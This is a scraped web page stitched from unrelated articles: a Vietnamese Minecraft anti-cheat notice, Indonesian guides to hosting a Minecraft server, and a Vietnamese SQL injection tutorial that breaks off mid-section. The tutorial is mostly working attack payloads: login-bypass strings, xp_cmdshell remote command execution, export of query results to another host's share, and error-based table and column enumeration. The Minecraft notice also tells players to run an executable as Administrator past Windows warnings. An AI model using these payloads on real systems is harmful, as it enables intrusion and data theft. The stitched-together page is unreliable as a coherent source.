Đề Xuất 3/2023 # Xác Minh Chống Hack Minecraft Server Heromc.net # Top 12 Like

Cập nhật nội dung chi tiết về Xác Minh Chống Hack Minecraft Server Heromc.net mới nhất trên website Honggaitour.com. Hy vọng thông tin trong bài viết sẽ đáp ứng được nhu cầu ngoài mong đợi của bạn, chúng tôi sẽ làm việc thường xuyên để cập nhật nội dung mới nhằm giúp bạn nhận được thông tin nhanh chóng và chính xác nhất.

Với việc quá nhiều bạn sử dụng phầm mềm bên thứ 3 để tạo lợi thế cho mình khi chơi. BQT quyết định cài xác minh chống hack vào để cho game được công bằng hơn. Tất cả các bản Mod Không được phép sử dụng sẽ bị trương trình xác minh loại bỏ. Khiến cho người chơi dùng Hⱥck sẽ không vào được server. Điều này có thể gây khó khăn cho một số người chơi có thói quen sử dụng các mod hỗ trợ PvP nhưng hy vọng các bạn sẽ nghiêm túc thực hiện và hy sinh lợi ích cá nhân để xây dựng một máy chủ lâu dài và ổn định.

Các bước xác minh chống hack

Nếu bạn sử dụng phiên bản Minecraft được cho phép, phần mềm sẽ hiện thông báo Bạn đã xác minh thành công và bạn có thể vào server chơi như bình thường! Thật là đơn giản phải không ?

Bạn có thể lưu phần mềm xác minh Hack này lại và sau này khi vào server bạn chỉ cần chạy nó lên để xác minh thôi. Không cần phải tải lại nữa !

Các Lỗi thường gặp khi các bạn Dùng Xác Minh Chống Hack

Các bạn dùng phiên bản quá cũ hoặc quá mới để vào server ( Hãy dùng 1.12.2 )

Các bạn không cung cấp đầy đủ Quyền ADMIN cho eflame (Chuột Trái vào eflame chọn dòng Run As Administrator )

Các bạn bật eflame trước khi đăng nhập pass vào server ( Hãy nhập pass trước khi vào )

Lỗi ( the main server is currently down ) Không thể kết nối vào máy chủ eflame hãy cố gắng làm lại vài lần các bạn sẽ vào đc.

Lưu ý sử dụng xác minh chống hack:

– Nếu bạn mở từ 2 cửa sổ minecraft trở lên, chương trình xác minh sẽ không chạy. – Với những bạn dùng windows 10, trong một số trường hợp, có thể windows sẽ hiện thông báo như bên dưới, thì hãy nhấn vào dòng “More Info” như mũi tên trong hình

Sau đó ấn chọn “Run Anyway” để chạy chương trình:

Những phiên bản nào được cho phép

Nếu như việc xác minh thất bại, và bạn bị kick khỏi server với thông báo như sau

Điều này có nghĩa là phiên bản bạn đang dùng (hoặc mod bạn đang dùng) hiện tại không được server cho phép.

Các Vanilla thông thường không được phép dùng:

– Minecraft Vanilla (không mod) tất cả phiên bản – Optifine cài trực tiếp không Forge (tất cả phiên bản) – Forge Mod Loader tất cả phiên bản. Xem những mod được cho phép bên dưới

Hiện tại, những Mod Forge sau được cho phép sử dụng

– OptiFine_1.8.0_HD_U_I7 – OptiFine_1.8.8_HD_U_I7 – Optifine 1.8.9_HD_U_I7, – Optifine 1.10.2_HD_U_E7, – Optifine 1.11.2_HD_U_C7, – Optifine 1.12.2_HD_U_E3, – Optifine 1.13.2_HD_U_E5

– FoamFix (0.6.3 – 0.11.0)

– The 5zig Mod v3.12.5 ( 1.8.9, 1.10.2, 1.11.2, 1.12.2, 1.13.2 )

– KeystrokesMod v5.0.1 (1.8.9 )

Tại sao phải xác minh chống hack

Để loại bỏ những người chơi không công bằng sử dụng hack cheat, chúng tôi áp dụng hình thức xác minh để đảm bảo rằng bạn đang chơi server một cách trong sạch! Biện pháp này có hiệu quả hơn nhiều so với phương pháp report – xử lí truyền thống.

Những lợi ích khi dùng phần mềm xác minh

– Tuy sẽ không loại bỏ được 100% cheater, nhưng biên pháp này cũng sẽ giảm được tình trạng hack tràn lan trên server làm những người chơi trong sạch cảm thấy khó chịu – Vì vậy, bạn sẽ không cần phải tốn công quay video report và đợi staff xử lí như trước nữa! – Điều này cũng giúp staff dành nhiều thời gian phát triển server hơn, và đỡ tốn thời gian vào việc xử lí hack Phần mềm xác minh sẽ làm gì?

– Phần mềm xác minh sẽ kiếm tra xem phiên bản Minecraft bạn dùng có được cho phép hay không. Nếu bạn dùng Forge, phần mềm sẽ kiểm tra xem bạn có dùng mod được cho phép hay không. – Phần mềm không động đến bất kì dữ liệu nào khác của bạn. – Phần mềm này có tên là eFlame tác giả viết phần này tên Lubenica sinh sống tại Cộng Hòa Croatia.

4.6

(

bình chọn

)

Membuat Server Minecraft Sendiri Dengan Vps

Salah satu game yang paling populer adalah Minecraft, Game yang dirilis tahun 2011 tersebut telah terjual lebih dari 176 juta kali pada saat itu. Game ini sepenuhnya dapat dikustomisasi, Dengan membuat server minecraft sendiri kamu mendapat kebebasan penuh untuk memodifikasi gameplay sesuai preferensi kamu sendiri.

Minecraft dapat dimainkan secara offline maupun online, bisa sendiri atau multiplayer bersama teman-teman. Apabila kamu ingin bermain dengan mode multiplayer, akan lebih baik jika jika kamu punya server sendiri. Nah artikel ini akan membahas tentang tutorial cara membuat server minecraft sendiri dengan VPS.

Apa itu Minecraft?

Minecraft adalah game yang memungkinkan pemain membangun dunia 3 dimensi menggunakan berbagai blok berbeda. Game ini membutuhkan kreativitas dari para pemain untuk mendesain dan membangun dunia virtual mereka sendiri.

Pada Java Edition, Memungkinkan para pemain untuk menyesuaikan permainan dengan mods sehingga mereka dapat membuat preferensi sendiri mengenai mekanisme permainan, item, tekstur dan aset gameplay baru.

Game ini memiliki beberapa mode permainan yang telah tersedia:

Mode Kreatif , Mode yang memungkinkan pemain membangun apa pun yang dapat mereka bayangkan dari sumber daya tanpa batas yang diberikan kepada mereka.

Mode Survival, Mode dimana pemain harus mengumpulkan sumber daya alam seperti kayu dan batu dengan menjelajahi dunia. Pemain juga perlu membangun rumah untuk melindungi diri dari musuh dan sumber makanan untuk bertahan hidup.

Game ini mendukung mode Multiplayer, Sehingga kamu dapat bermain dengan banyak pemain untuk berinteraksi dan berkomunikasi satu sama lain di satu dunia. Pemain dapat terhubung ke server yang tersedia untuk umum atau menggunakan server Minecraft pribadi untuk saling berinteraksi.

Mengapa Kamu Harus Menjalankan Server Minecraft Pribadi?

Ketika kamu menggunakan server minecraft yang sudah tersedia, Maka jangkauan permainan kamu terbatas. Kamu terikat dengan aturan dunia tempat kamu bermain. Berbeda jika kamu membuat server minecraft sendiri.

Dengan menggunakan server Minecraft miliki kamu sendiri, Kamu dapat mengatur preferensi aturan permainan dan mengundang siapapun untuk bermain bersama kamu. Kamu dibebaskan menginstal semua mod yang kamu inginkan dan menyesuaikan dunia kamu dengan elemen-elemen yang awalnya tidak tersedia sebelumnya di game.

Tertarik untuk membangun server minecraft kamu sendiri? Yuk ikuti informasi dan tutorial mengenai pembuatan server minecraft pribadi.

Spesifikasi Server untuk Game Minecraft

Berapa spesifikasi server yang dibutuhkan untuk membuat server minecraft pribadi? Spesifikasi yang dibutuhkan untuk membangun server minecraft tidak begitu besar. Minecraft membutuhkan setidaknya RAM berkapasitas 1024MB, Lebih besar lebih baik agar performa saat bermain game lebih tinggi.

Selain RAM kapasitas bandwidth juga tak kalah penting, Terutama jika server pribadi kamu digunakan untuk banyak orang.

Cara Membuat Server Minecraft di VPS

Setelah kamu memiliki VPS yang nantinya digunakan untuk membangun server minecraft sendiri, Sudah saatnya untuk menginstal Minecraft game server. Berikut cara membuat server minecraft sendiri dengan VPS :

Buat folder baru untuk menyimpan data minecraft, gunakan perintah “mkdir minecraft“

Masuk ke direktori minecraft yang sudah kamu buat, gunakan perintah “cd minecraft“

Install Java, Gunakan perintah “apt-get install default-jdk“

Unduh Aplikasi Minecraft, Gunakan perintah “wget https://launcher.mojang.com/v1/objects/3dc3d84a581f14691199cf6831b71ed1296a9fdf/server.jar“

Buka port default Minecraft “25565”

Rubah pengaturan eula, Gunakan perintah “nano chúng tôi Kemudian ubah nilai eula dari false menjadi true.

Install Screen untuk menjalankan minecraft server walaupun kamu terhubung ke VPS atau berjalan di belakang layar, gunakan perintah “sudo yum install screen”

Jalankan aplikasi minecraft, Gunakan perintah “screen java -Xmx1024M -Xms1024M -jar minecraft_server.jar nogui” Note : -Xms dan -Xmx untuk menentukan jumlah minimum dan maksimum RAM, Kamu bisa merubahnya.

Setelah kamu mengikuti langkah-langkah diatas, Kamu sudah bisa menggunakan server minecraft kamu sendiri. Server Minecraft yang dibuat di atas menggunakan pengaturan standar.

Jika kamu ingin membuat dunia baru, ubah level-name direktif dalam file server.properties serta pengaturan lain yang sesuai. Untuk informasi lebih lanjut, Kamu bisa melihat dokumentasi resmi.

Cara terhubung ke server Minecraft saya sendiri?

Setelah kamu sudah mempunyai server sendiri, Kamu bisa langsung menggunakannya. Lalu bagaimana caranya? Caranya pun cukup mudah, Saat server kamu sudah aktif dan berjalan, sambungkan ke klien game Minecraft. Caranya sebagai berikut :

Jalankan game minecraft kamu

Setelah itu masuk ke akun Minecraft Anda, dan klik tombol Multiplayer.

Klik tambah Server dan masukkan nama untuk server kamu dan alamat IP publik VPS kamu

Server kamu sekarang terdaftar dalam daftar server. Klik pada server dan kemudian gabung server untuk menghubungkannya.

Selamat! Sekarang kamu terhubung ke server Minecraft kamu sendiri

Itulah cara membuat server minecraft sendiri, Kamu bisa bermain game sebebas mungkin dengan server minecraft yang sudah kamu buat. Kamu bisa jadikan Minecraft sebagai Game saat WFH.

Oh ya, sayang sekali, Jagoan Hosting Indonesia belum memiliki layanan untuk kamu bisa bikin server game minecraft kamu sendiri. Tenang, kami sedang mengupayakannya, kok! Dan jika kamu butuh server untuk keperluan lain selain game, kamu bisa menggunakan VPS Jagoan Hosting, VPS Indonesia terbaik dan paling direkomendasikan.

Cara Membuat Server Minecraft Di Berbagai Perangkat

access_time

October 28, 2020

hourglass_empty

6min Read

Memiliki server game sendiri pasti rasanya lebih menyenangkan. Anda bebas menentukan peraturan game dan bahkan membangun komunitas di dalamnya. Nah, di Hostinger, ada layanan Minecraft hosting yang ditujukan bagi para gamer yang ingin membangun servernya sendiri. Di artikel ini, kami akan menunjukkan cara membuat server Minecraft di hPanel dan platform lainnya, yakni Windows, Ubuntu, dan CentOS.

Buat Server Minecraft

Memilih Layanan & Paket Minecraft Hosting

Untuk menjalankan server yang lebih besar, dibutuhkan resource. Di Hostinger, tersedia lima paket hosting dengan kapasitas ruang yang berbeda-beda.

Misalnya, nih, Anda ingin membuat server Minecraft yang bisa menampung hingga 100 pemain. Agar semuanya berjalan lancar dan tidak ada kendala, paket hosting yang dipilih adalah Villager Plan dengan memori sebanyak 3 GB. Dengan kapasitas sebesar ini, Anda bisa mengelola server Minecraft dan memberikan pengalaman terbaik untuk setiap pemain.

Pada dasarnya, semakin banyak RAM yang ada di server, semakin banyak orang yang bisa bermain di saat bersamaan. Jadi, perlu diingat, kalau paket hosting yang dipilih hanya untuk 100 pemain tapi yang ikut serta lebih dari batasan yang ditetapkan, server akan nge-lag atau melambat. Akibatnya, pengalaman bermain game kurang memuaskan.

Tak hanya itu, terkadang kita seolah ‘terlena’ dengan kapasitas RAM. Menggangap masih ada ruang yang tersisa, kita punya alasan untuk menginstall sebanyak mungkin plugin. Sayangnya, tindakan ini hanya akan membuat kecepatan server jadi berkurang.

Bijaklah dalam memilih paket Minecraft Hosting. Selain mempertimbangkan kapasitas RAM dan jumlah pemain, cari tahu pula fitur pendukungnya. Paket Minecraft Hosting di Hostinger, misalnya, dilengkapi berbagai fitur tambahan, seperti proteksi terhadap DDoS, off-site backup otomatis, dan masih banyak lagi. Kami juga menghadirkan bantuan pelanggan 24/7 yang bisa dihubungi kapan saja bilamana Anda menemui kendala atau punya pertanyaan.

Setelah memilih paket dan menyelesaikan pembelian, masuk ke akun Hostinger. Ikuti langkah-langkah berikut ini:

Di bagian Setup di hPanel, akan ada server Minecraft yang baru saja dibeli. Klik Kelola (Setup) persis di samping kanan server.

Ikuti instruksinya, misalnya menentukan nama server dan password root.

Nantinya server Minecraft VPS akan ada di bagian VPS di beranda utama hPanel. Klik Continue (Lanjutkan) untuk membuka layar Server Management.

Untuk memulai setup server, klik tombol Start di bawah Server Status. Tunggu selama beberapa menit.

Cara Membuat Server Minecraft di Linux

Proses pembuatan server Minecraft Ubuntu dan CentOS hampir sama. Namun, ada beberapa perbedaan yang akan terlihat jelas ketika menginstall package.

1. Install Java dan Screen

Perlu diingat, untuk tutorial ini, sistem operasi yang digunakan adalah ubuntu 16.04 dan CentOS 7.

Pertama-tama, buat sambungan ke server melalui SSH. Lalu buka terminal shell bawaan (PuTTY untuk pengguna Windows) dan ketik perintah berikut:

ssh username@ipaddress

CATATAN: Jangan lupa ganti username dan alamat IP server. Begitu terminal shell muncul, masukkan username dan password Anda.

Server Minecraft mengharuskan adanya Java. Cek apakah bahasa pemrograman dasar ini sudah terinstall di sistem dengan menjalankan perintah ini:

java -version

Kalau Java sudah terinstall, langsung lompat ke langkah 2. Tapi kalau belum, ikuti langkah berikutnya.

Jalankan dua perintah ini untuk mengunduh package software terbaru dan menginstall Java:

sudo apt-get update sudo apt-get install default-jdk sudo yum update sudo yum install java -y

Jika Java berhasil diinstall, selanjutnya install Screen:

sudo apt-get install screen sudo yum install screen -y

2. Menginstall dan Menjalankan Minecraft Server di Linux

Setelah Java dan Screen terpasang, selanjutnya install Minecraft server.

Buat direktori baru untuk menyimpan semua file konfigurasi Minecraft. Sebenarnya, langkah ini opsional, tapi kami menyarankan Anda untuk tetap membuatnya agar sistem tertata rapi. Ketik perintah berikut:

mkdir minecraft

Jalankan perintah ini untuk berpindah ke direktori yang baru saja dibuat:

cd minecraft

Sebelum mengunduh file konfigurasi yang dibutuhkan, install wget:

sudo apt-get install wget sudo yum install wget -y

Gunakan perintah wget untuk mengunduh file properti server Minecraft:

wget https://launcher.mojang.com/v1/objects/bb2b6b1aefcd70dfd1892149ac3a215f6c636b07/server.jar

Untuk tutorial ini, kami menggunakan versi 1.15.2. Buka link ini dan cek ketersediaan versi terbaru. Jika ada dan bisa diunduh, ganti link yang ada pada perintah di atas dengan link versi terbaru.

Gunakan perintah berikut ini untuk menjalankan file properti Minecraft server. Apabila yang ingin digunakan adalah software antarmuka pengguna grafis, hapus nogui:

java -Xmx1024M -Xms1024M -jar minecraft_server.1.15.2.jar nogui

Sampai di sini, program server belum aktif. Malahan file EULA (end-user license agreement) yang akan dibuat dan harus Anda terima (accept).

Untuk menerima EULA Minecraft, buka file chúng tôi menggunakan Nano text editor:

sudo nano eula.txt

Cari baris yang berisikan string ini:

eula=false

Lalu ubah ke:

eula=true

Simpan perubahan yang dibuat.

Aktifkan Screen agar server berjalan di latar belakang:

screen -S "Minecraft server 1"

Namanya bisa diganti sesuai dengan keinginan Anda.

Selesai! Server Minecraft berhasil terinstall di Ubuntu atau CentOS.

3. Menjalankan Minecraft Server

Ketik perintah di bawah ini untuk menjalankan server Minecraft:

java -Xmx1024M -Xms1024M -jar minecraft_server.1.14.4.jar nogui

Kapasitas minimum RAM yang dibutuhkan untuk menjalankan server ini adalah 1024 MB (1 GB). Nah, karena itulah kami memasukkan 1024M setelah -Xmx dan -Xms. Jika ingin mengalokasikan lebih banyak RAM, ubah angkanya ke 2048 dst. Lakukan ini sesuai dengan besaran kapasitas yang ditawarkan server.

Berikut output setelah perintah dijalankan:

Untuk membuka kembali layar Screen, ketik perintah ini:

screen -r

Buka file properti server menggunakan Nano untuk mengkustomisasikan pengaturan server:

nano ~/minecraft/server.properties

Saran kami, tetap gunakan konfigurasi default untuk menghindari hal-hal yang tidak diinginkan.

Cara Memuat Server Minecraft di Windows

Buka command prompt dan cek versi Java yang terinstall di komputer:

java -version

Jika versinya sama dengan versi terbaru yang ada di website resminya, lakukan langkah selanjutnya. Tapi kalau suda kedaluwarsa atau belum diinstall, unduh installer-nya.

Unduh software setup (file .jar) di halaman server resmi.

Buat folder baru untuk Minecraft server dan pindahkan file .jar ke folder ini.

Klik dua kali di program setup untuk membuat file chúng tôi .

Buka file EULA dan ganti value dari false ke true.

Klik dua kali pada file .jar untuk mengaktifkan server Minecraft. Izinkan program melalui firewall terlebih dulu.

Cara alternatif, buka command prompt dan pilih folder khusus Minecraft. Sebagai contoh:

cd Documents/Minecraft

Jalankan perintah berikut:

java -Xmx1024M -Xms1024M -jar minecraft_server.1.15.2.jar nogui

Apabila layar seperti di bawah ini ditampilkan, itu berarti Minecraft server berhasil diaktifkan:

Secara default, Java merupakan bahasa pemrograman bawaan di macOS versi terbaru. Untuk mengecek ketersediaannya, jalankan perintah ini di terminal:

java -version

Jika belum terinstall, unduh dan install legacy version Java melalui website Apple.

Buat folder sendiri untuk server Minecraft. Unduh program setup Minecraft server dan simpan di folder ini.

#!/bin/bash cd "$(dirname "$0")" exec java -Xms1024M -Xmx1024M -jar minecraft_server.1.15.2.jar nogui

Simpan file dengan nama startmc.command di direktori yang sama dengan direktori file server Minecraft.

Dibutuhkan izin (permission) untuk mengaktifkan file startmc.command. Buka terminal dan tambahkan folder Minecraft. Misalnya:

cd Documents/MinecraftServer

Berikan hak akses dengan menjalankan perintah ini:

chmod a+x startmc.command

Kalau semua langkah di atas dilakukan dengan benar, server bisa dijalankan dengan mengklik dua kali di file startmc.command. Layar terminal baru akan terbuka.

Kemungkinan besar peringatan hilangnya file atau direktori akan muncul di langkah ini. Notifikasi semacam ini normal, dan tidak perlu dikhawatirkan karena kerap muncul jika server Minecraft baru pertama kali dijalankan.

Cara Menggunakan Minecraft Control Manager

Untuk masuk ke pengaturan kontrol server Minecraft, klik Control Panel Link yang ada di halaman pengaturan VPS. Tampilannya seperti ini:

http://00.000.00.00/multicraft/index.php

Ketik Username dan Password untuk masuk ke Minecraft Server Manager dan membuat server.

Klik opsi Select Server yang ada di sisi kiri dashboard.

Lengkapi Name dan Player Slots server.

Dengan opsi Assign to user, Anda bisa memilih user untuk diberikan hak akses agar dapat mengelola server. Jika ingin mengelola server sendiri, cukup ketik admin.

Kosongkan IP, Port, Memory, JAR File. Value default akan terbentuk dengan sendirinya.

Simpan (Save) pengaturan. Jika sudah selesai, klik Start dan server siap online.

Dengan lebih dari 68 juta pemain, sampai saat ini Minecraft masih masuk dalam kategori video game paling populer.

Salah satu keunggulannya adalah memungkinkan pemain untuk membuat dunia virtual. Anda bebas berimajinasi dan membangun ‘mahakarya‘. Apalagi kalau membuat server Minecraft sendiri, game bisa didesain seunik dan sekreatif mungkin.

Memiliki server khusus game Minecraft berarti Anda punya kontrol terhadap gameplay (aturan permainan). Anda bisa melakukan apa saja, seperti mengundang teman atau user lain, membuat peraturan sendiri, menginstall mod, dan masih banyak lagi.

Banyak orang yang salah paham, mengira membangun server Minecraft itu sulit dan menelan biaya yang tak sedikit. Nyatanya tidak demikian. Paket hosting yang tersedia hadir dengan harga yang bersahabat. Anda pun hanya memerlukan pemahaman soal command-line interface untuk menjalankan server Minecraft. Terlebih lagi, server ini bisa dipasang di sistem operasi yang Anda pakai saat ini, yaitu Windows, Linux, atau macOS.

Kesimpulan

Kalau ingin pengalaman bermain Minecraft lebih menyenangkan, Anda harus tahu cara membuat server Minecraft sendiri. Selain menentukan peraturan, Anda juga bisa lebih bebas.

Di artikel ini, Anda sudah mempelajari cara membuat Minecraft server di hPanel, Linux (Ubuntu dan CentOS), Windows, dan macOS. Panduannya mudah, kan?

Happy building!

Tấn Công Kiểu Sql Injection Và Các Phòng Chống Trong Asp.net

1. SQL Injection là gì?

SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, …

2. Tìm kiếm mục tiêu

Có thể tìm các trang web cho phép submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng, chẳng hạn như các trang login, search, feedback, …

Ví dụ:

http://yoursite.com/index.asp?id=10

Một số trang web chuyển tham số qua các field ẩn, phải xem mã HTML mới thấy rõ. Ví dụ như ở dưới.

3. Kiểm tra chỗ yếu của trang web

Thử submit các field username, password hoặc field id, .. bằng hi' or 1=1--

Password: hi' or 1=1--

http://yoursite.com/index.asp?id=hi' or 1=1--

Nếu site chuyển tham số qua field ẩn, hãy download source HTML, lưu trên đĩa cứng và thay đổi lại URL cho phù hợp. Ví dụ:

Nếu thành công, thì có thể login vào mà không cần phải biết username và password

4. Tại sao ' or 1=1-- có thể vượt qua phần kiểm tra đăng nhập?

Giả sử như có một trang ASP liên kết đến một ASP trang khác với URL như sau:

http://yoursite.com/index.asp?category=food

Trong URL trên, biến 'category' được gán giá trị là 'food'. Mã ASP của trang này có thể như sau (đây chỉ là ví dụ thôi):

v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr)

v_cat sẽ chứa giá trị của biến request("category") là 'food' và câu lệnh SQL tiếp theo sẽ là:

SELECT * FROM product WHERE PCategory='food'

Dòng query trên sẽ trả về một tập resultset chứa một hoặc nhiều dòng phù hợp với điều kiện WHERE PCategory='food'

Nếu thay đổi URL trên thành http://yoursite.com/index.asp?category=food' or 1=1-- , biến v_cat sẽ chứa giá trị "food' or 1=1-- " và dòng lệnh SQL query sẽ là:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

Dòng query trên sẽ select mọi thứ trong bảng product bất chấp giá trị của trường PCategory có bằng 'food' hay không. Hai dấu gạch ngang (--) chỉ cho MS SQL server biết đã hết dòng query, mọi thứ còn lại sau "--" sẽ bị bỏ qua. Đối với MySQL, hãy thay "--" thành "#"

Ngoài ra, cũng có thể thử cách khác bằng cách submit ' or 'a'='a. Dòng SQL query bây giờ sẽ là:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

Một số loại dữ liệu khác mà cũng nên thử submit để biết xem trang web có gặp lỗi hay không:

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

5. Thi hành lệnh từ xa bằng SQL Injection

Nếu cài đặt với chế độ mặc định mà không có điều chỉnh gì, MS SQL Server sẽ chạy ở mức SYSTEM, tương đương với mức truy cập Administrator trên Windows. Có thể dùng store procedure xp_cmdshell trong CSDL master để thi hành lệnh từ xa:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Hãy thử dùng dấu nháy đôi (") nếu dấu nháy đơn (') không làm việc.

Dấu chấm phẩy (sẽ kết thúc dòng SQL query hiện tại và cho phép thi hành một SQL command mới. Để kiểm tra xem lệnh trên có được thi hành hay không, có thể listen các ICMP packet từ 10.10.1.2 bằng tcpdump như sau:

#tcpdump icmp

Nếu nhận được ping request từ 10.10.1.2 nghĩa là lệnh đã được thi hành.

6. Nhận output của SQL query

Có thể dùng sp_makewebtask để ghi các output của SQL query ra một file HTML

'; EXEC master..sp_makewebtask "\10.10.1.3shareoutput.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Chú ý: folder "share" phải được share cho Everyone trước.

7. Nhận dữ liệu qua 'database using ODBC error message'

Các thông báo lỗi của MS SQL Server thường đưa cho bạn những thông tin quan trọng. Lấy ví dụ ở trên http://yoursite.com/index.asp?id=10, bây giờ chúng ta thử hợp nhất integer '10' với một string khác lấy từ CSDL:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Bảng INFORMATION_SCHEMA.TABLES của hệ thống SQL Server chứa thông tin về tất cả các bảng (table) có trên server. Trường TABLE_NAME chứa tên của mỗi bảng trong CSDL. Chúng ta chọn nó bởi vì chúng ta biết rằng nó luôn tồn tại. Query của chúng ta là:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Dòng query này sẽ trả về tên của bảng đầu tiên trong CSDL

Khi chúng ta kết hợp chuỗi này với số integer 10 qua statement UNION, MS SQL Server sẽ cố thử chuyển một string (nvarchar) thành một số integer. Điều này sẽ gặp lỗi nếu như không chuyển được nvarchar sang int, server sẽ hiện thông báo lỗi sau:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5

Thông báo lỗi trên cho biết giá trị muốn chuyển sang integer nhưng không được, "table1". Đây cũng chính là tên của bảng đầu tiên trong CSDL mà chúng ta đang muốn có.

Để lấy tên của tên của bảng tiếp theo, có thể dùng query sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

Cũng có thể thử tìm dữ liệu bằng cách khác thông qua statement LIKE của câu lệnh SQL:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Khi đó thông báo lỗi của SQL Server có thể là:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. /index.asp, line 5

Mẫu so sánh '%25login%25' sẽ tương đương với %login% trong SQL Server. Như thấy trong thông báo lỗi trên, chúng ta có thể xác định được tên của một table quan trọng là "admin_login".

8. Xác định tên của các column trong table

Table INFORMATION_SCHEMA.COLUMNS chứa tên của tất cả các column trong table. Có thể khai thác như sau:

http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--